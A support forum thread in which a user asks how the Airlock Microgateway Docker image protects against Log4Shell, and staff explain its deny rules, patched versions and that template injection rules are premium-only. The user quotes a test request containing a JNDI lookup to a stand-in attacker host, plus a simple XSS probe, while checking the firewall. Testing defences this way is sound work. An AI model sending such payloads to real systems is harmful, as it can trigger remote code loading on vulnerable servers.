Log4shell no information

How do Airlock Docker Hub protect log4shell vulnerability? I do not see public information on https://docs.airlock.com/

Thanks
Buran

Hi Buran

The short answer is:
Airlock Gateway and Airlock Microgateway include a default Deny Rule Group Template Injection that protects against Log4Shell exploits. With these rules set to blocking level Standard or Strict, any vulnerable backend application should be protected.

Here are some more details on how this protection works:
You are probably aware that Airlock Gateway and Airlock Microgateway share the same security core. They both protect web applications and APIs using a combination of different filtering methods. For example, there are many Deny Rules that detect and block attacks like Cross-Site-Scripting (XSS) or Log4Shell. These are essentially black list rules that match certain attack types in a generic manner. This means these rules donโ€™t just match a single exploit variant, they rather detect whole classes of attack.

We do not disclose the exact patterns of our deny rules. But these rules are very generic and therefore pretty aggressive. We block everything that has ${ in it. So far, we have not seen any attack variants that are missed by our rules (evasions). These template injection rules are already active in the standard security level since Airlock Microgateway 2.0 and Airlock Gateway 7.6. We are not aware of any negative feedback on false positives in this regard. If there are, you can capture precise exceptions, e.g. if a back-end is not vulnerable for sure.

Airlock Microgateway itself is not known to be exploitable. To reduce the risk of indirect or side-channel attacks to vulnerable Java components running on Airlock Microgateway, we have published updated versions 2.1.4 and 3.1.1.

Does this answer your question?
Best regards,
Dani

PS: Maybe this article is also worth reading: Log4Shell: What matters now | Airlock

Thank you. It seems that the docker image does not block Log4Shell like /s/frame.do?${jndi:ldap://attacker.com/a}
. Other attacks /s/frame.do?<script>test</script> are blocked. Are these Template Injection rules not enabled by default?

Thanks

Hi Buran

The community edition contains deny rules against the following attacks:
SQL injection, XSS and sanity checks.

The comparison overview of the community edition and premium edition illustrates it:
Community vs. premium features

Available in community and premium edition:

Selected Deny Rules
SQLi or XSS attack prevention, sanity checks

Only available in the premium edition:

All Deny Rules
Over 30 more groups of blacklist rules

Feel free to request a trial license:
https://airlock.com/microgateway-premium

Stefan